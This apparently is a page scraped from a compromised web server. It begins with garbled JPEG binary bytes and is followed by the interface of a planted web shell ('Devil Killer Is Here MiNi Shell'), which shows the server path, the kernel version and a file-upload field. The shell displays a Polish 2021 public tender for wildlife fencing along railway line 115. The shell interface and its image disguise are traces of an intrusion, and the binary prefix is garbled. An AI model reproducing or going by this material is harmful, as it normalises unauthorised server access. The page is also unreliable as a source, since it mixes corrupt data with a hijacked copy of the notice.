JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211029/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211029/0025050801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów – Szczucin) – od autostrady A4 do Szczucina, ograniczających migrację dzikich zwierząt, potencjalnych nosicieli ASF – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Dąbrowa Tarnowska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350545553</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szarwarska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Tarnowska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dabrowatar@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dabrowa.krakow.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów – Szczucin) – od autostrady A4 do Szczucina, ograniczających migrację dzikich zwierząt, potencjalnych nosicieli ASF – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fb17acdd-3873-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00250508</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_dabrowa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy https://platformazakupowa.pl/pn/lasy_dabrowa</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z platformy https://platformazakupowa.pl/strona/1-<br/>regulamin, stanowiącym załącznik nr 9 do SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych<br/>osobowychjest Nadleśnictwo Dąbrowa Tarnowska. Administrator z którym w sprawach dotyczących<br/>przetwarzania<br/>danych osobowych można skontaktować się telefonicznie pod numerem 668 489 563 lub za<br/>pośrednictwem poczty elektronicznej na adres: udodo@lasy.gov.pl.2. Zamawiający przetwarza dane<br/>osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. 3. Zamawiający udostępnia<br/>dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. 4. Do przetwarzania<br/>danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby<br/>posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności 5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art.<br/>93 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.6. Odbiorcami danych<br/>osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o art. 8-8a oraz 96 ust. 3-3b PZP.7. Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art.<br/>97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy w sprawie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SI.270.43.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie zadania „Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów – Szczucin) – od autostrady A4 do Szczucina, ograniczających lub zatrzymujących migrację dzikich zwierząt, potencjalnych nosicieli ASF – II postępowanie” <br/> - Pakiet I – odcinek Szczucin – Mędrzechów – 10,900 km<br/><br/><br/>Wykonawca może złożyć ofertę na jedną lub dwie części zamówienia. Oferta złożona na daną część zamówienia musi obejmować cały zakres prac przewidzianych w SWZ dla danej części. <br/>3.	Miejscem realizacji przedmiotu zamówienia będzie teren linii kolejowej nr 115 Tarnów – Szczucin od autostrady A4 do Szczucina. W I-szym postępowaniu wyłoniono wykonawcę na budowę ogrodzenia na odcinku od autostrady A4 do Olesna (Pakiet III oraz Pakiet IV). Obecnie w II-gim postępowaniu chcemy znaleźć wykonawcę budowy ogrodzenia na odcinku Olesno – Szczucin. <br/>4.	Zakresy rzeczowe przedmiotu zamówienia określają przedmiary robót sporządzone oddzielnie dla każdej części (Pakietu), które są załącznikiem do niniejszego SWZ. Mają one charakter szacunkowy. Rozliczenie robót będzie dokonane powykonawczo, wg faktycznej ilości wykonanych robót.<br/>5.	Ogólny standard technologii prac obejmuje:<br/>a)	Przygotowanie powierzchni do montażu ogrodzenia przez zmulczowanie roślinności (porosty, krzewy i pojedyncze drzewa) pasem o szerokości min. ok. 2,50 + 2,0m (korona nasypu plus skarpa) co będzie utrudnione z powodu szyn, które znajdują się w gąszczu krzaków. Linia kolejowa na tym odcinku nie jest użytkowana od ok. 25 lat<br/>b)	Dostarczenie materiałów do miejsca wbudowania. Zamawiający dostarczy i przekaże poszczególnym Wykonawcom słupy sosnowe dł. 2,50m, średnicy 12-18cm oraz siatkę leśną 160cm na składach zlokalizowanych na placach po byłych stacjach kolejowych w Szczucinie, Mędrzechowie, Oleśnie. Transport technologiczny z tych składów do miejsc wbudowania obciążać będzie Wykonawcę.<br/>c)	Wykonanie otworów na słupki o głębokości min. 0,60m w odległościach co ok. 4,0m (dopuszczalna odchyłka +/- 0,5m w zależności od warunków terenowych). <br/>d)	Ustawienie słupów, obsypanie gruntem z ukopu, ubicie zasypu.<br/>e)	Rozwinięcie, zawieszenie , napięcie i przymocowanie siatki do słupów oraz dołem do drutu nośnego.<br/>f)	Zabezpieczenie słupów przed wychylaniem poprzez wykonanie ukośnych podpór, zagłębionych dołem w gruncie i przybitych w zaciosie do słupa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45342000-6 - Wznoszenie ogrodzeń</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, polegających<br/>na powtórzeniu tego samego rodzaju zamówień zgodnie z art. 214 ust. 1 pkt 7 ustawy Prawo<br/>zamówień publicznych tj. w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia<br/>podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych zamówień<br/>uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających<br/>na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w<br/>trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane<br/>w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia<br/>podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami: <br/><br/>a) Cena wykonania zamówienia – 60 % <br/>Oferta z najniższą ceną otrzyma maksymalną ilość punktów = 60 pkt, oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej wg wzoru: <br/>C = [C min / C bad] x 60 <br/>gdzie: <br/>C - liczba punktów za cenę ofertową <br/>C min - najniższa cena ofertowa spośród ofert badanych <br/>C bad - cena oferty badanej <br/><br/>Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych. <br/><br/>b) Kryterium „Skrócenie terminu realizacji ” – 40%<br/>Zamawiający przyzna punkty w tym kryterium wg poniższych warunków:<br/> Maksymalny termin wykonania – 60 dni od daty zawarcia umowy<br/>- za skrócenie tego terminu o 5 dni Zamawiający przyzna 10 pkt,<br/>- za skrócenie tego terminu o 10 dni Zamawiający przyzna 20 pkt<br/>- za skrócenie tego terminu o 15 dni Zamawiający przyzna 30 pkt<br/>- za skrócenie tego terminu o 20 dni Zamawiający przyzna 40 pkt<br/><br/>Ocena oferty w ramach tego kryterium, zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty. W przypadku braku wskazania w formularzu oferty oświadczenia w zakresie „Skrócenie terminu realizacji”, Zamawiający przyjmie do oceny maksymalny 60 dniowy termin realizacji zamówienia i przyzna Wykonawcy 0 pkt. w niniejszym kryterium.<br/>Oferty Wykonawców, którzy zaoferują okres realizacji zamówienia inny niż mieszczący się w przedziale 40-60 dni zostaną odrzucone jako niezgodne z treścią SWZ.<br/><br/>Zamawiający w celu ustalenia, czy oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, zwróci się do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny. <br/>Zamawiający, oceniając wyjaśnienia, weźmie pod uwagę obiektywne czynniki, w szczególności oszczędność metody wykonania zamówienia, wybrane rozwiązania techniczne, wyjątkowo sprzyjające warunki wykonywania zamówienia dostępne dla Wykonawcy, oryginalność projektu Wykonawcy oraz wpływ pomocy publicznej udzielonej na podstawie odrębnych przepisów. <br/>Zamawiający odrzuci ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdzi, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie zadania „Budowa ogrodzeń wzdłuż linii kolejowej nr 115 (Tarnów – Szczucin) – od autostrady A4 do Szczucina, ograniczających lub zatrzymujących migrację dzikich zwierząt, potencjalnych nosicieli ASF – II postępowanie” <br/>- Pakiet II – odcinek Mędrzechów - Olesno – 7,900 km<br/>Oferta złożona na daną część zamówienia musi obejmować cały zakres prac przewidzianych w SWZ dla danej części.<br/>3.	Miejscem realizacji przedmiotu zamówienia będzie teren linii kolejowej nr 115 Tarnów – Szczucin od autostrady A4 do Szczucina. W I-szym postępowaniu wyłoniono wykonawcę na budowę ogrodzenia na odcinku od autostrady A4 do Olesna (Pakiet III oraz Pakiet IV). Obecnie w II-gim postępowaniu chcemy znaleźć wykonawcę budowy ogrodzenia na odcinku Olesno – Szczucin. <br/>4.	Zakresy rzeczowe przedmiotu zamówienia określają przedmiary robót sporządzone oddzielnie dla każdej części (Pakietu), które są załącznikiem do niniejszego SWZ. Mają one charakter szacunkowy. Rozliczenie robót będzie dokonane powykonawczo, wg faktycznej ilości wykonanych robót.<br/>5.	Ogólny standard technologii prac obejmuje:<br/>a)	Przygotowanie powierzchni do montażu ogrodzenia przez zmulczowanie roślinności (porosty, krzewy i pojedyncze drzewa) pasem o szerokości min. ok. 2,50 + 2,0m (korona nasypu plus skarpa) co będzie utrudnione z powodu szyn, które znajdują się w gąszczu krzaków. Linia kolejowa na tym odcinku nie jest użytkowana od ok. 25 lat<br/>b)	Dostarczenie materiałów do miejsca wbudowania. Zamawiający dostarczy i przekaże poszczególnym Wykonawcom słupy sosnowe dł. 2,50m, średnicy 12-18cm oraz siatkę leśną 160cm na składach zlokalizowanych na placach po byłych stacjach kolejowych w Szczucinie, Mędrzechowie, Oleśnie. Transport technologiczny z tych składów do miejsc wbudowania obciążać będzie Wykonawcę.<br/>c)	Wykonanie otworów na słupki o głębokości min. 0,60m w odległościach co ok. 4,0m (dopuszczalna odchyłka +/- 0,5m w zależności od warunków terenowych). <br/>d)	Ustawienie słupów, obsypanie gruntem z ukopu, ubicie zasypu.<br/>e)	Rozwinięcie, zawieszenie , napięcie i przymocowanie siatki do słupów oraz dołem do drutu nośnego.<br/>f)	Zabezpieczenie słupów przed wychylaniem poprzez wykonanie ukośnych podpór, zagłębionych dołem w gruncie i przybitych w zaciosie do słupa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45342000-6 - Wznoszenie ogrodzeń</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, polegających<br/>na powtórzeniu tego samego rodzaju zamówień zgodnie z art. 214 ust. 1 pkt 7 ustawy Prawo<br/>zamówień publicznych tj. w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia<br/>podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych zamówień<br/>uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających<br/>na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w<br/>trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane<br/>w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia<br/>podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami: <br/><br/>a) Cena wykonania zamówienia – 60 % <br/>Oferta z najniższą ceną otrzyma maksymalną ilość punktów = 60 pkt, oferty następne będą oceniane na zasadzie proporcji w stosunku do oferty najtańszej wg wzoru: <br/>C = [C min / C bad] x 60 <br/>gdzie: <br/>C - liczba punktów za cenę ofertową <br/>C min - najniższa cena ofertowa spośród ofert badanych <br/>C bad - cena oferty badanej <br/><br/>Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych. <br/><br/>b) Kryterium „Skrócenie terminu realizacji ” – 40%<br/>Zamawiający przyzna punkty w tym kryterium wg poniższych warunków:<br/> Maksymalny termin wykonania – 60 dni od daty zawarcia umowy<br/>- za skrócenie tego terminu o 5 dni Zamawiający przyzna 10 pkt,<br/>- za skrócenie tego terminu o 10 dni Zamawiający przyzna 20 pkt<br/>- za skrócenie tego terminu o 15 dni Zamawiający przyzna 30 pkt<br/>- za skrócenie tego terminu o 20 dni Zamawiający przyzna 40 pkt<br/><br/>Ocena oferty w ramach tego kryterium, zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty. W przypadku braku wskazania w formularzu oferty oświadczenia w zakresie „Skrócenie terminu realizacji”, Zamawiający przyjmie do oceny maksymalny 60 dniowy termin realizacji zamówienia i przyzna Wykonawcy 0 pkt. w niniejszym kryterium.<br/>Oferty Wykonawców, którzy zaoferują okres realizacji zamówienia inny niż mieszczący się w przedziale 40-60 dni zostaną odrzucone jako niezgodne z treścią SWZ.<br/><br/>Zamawiający w celu ustalenia, czy oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, zwróci się do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących elementów oferty mających wpływ na wysokość ceny. <br/>Zamawiający, oceniając wyjaśnienia, weźmie pod uwagę obiektywne czynniki, w szczególności oszczędność metody wykonania zamówienia, wybrane rozwiązania techniczne, wyjątkowo sprzyjające warunki wykonywania zamówienia dostępne dla Wykonawcy, oryginalność projektu Wykonawcy oraz wpływ pomocy publicznej udzielonej na podstawie odrębnych przepisów. <br/>Zamawiający odrzuci ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdzi, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> 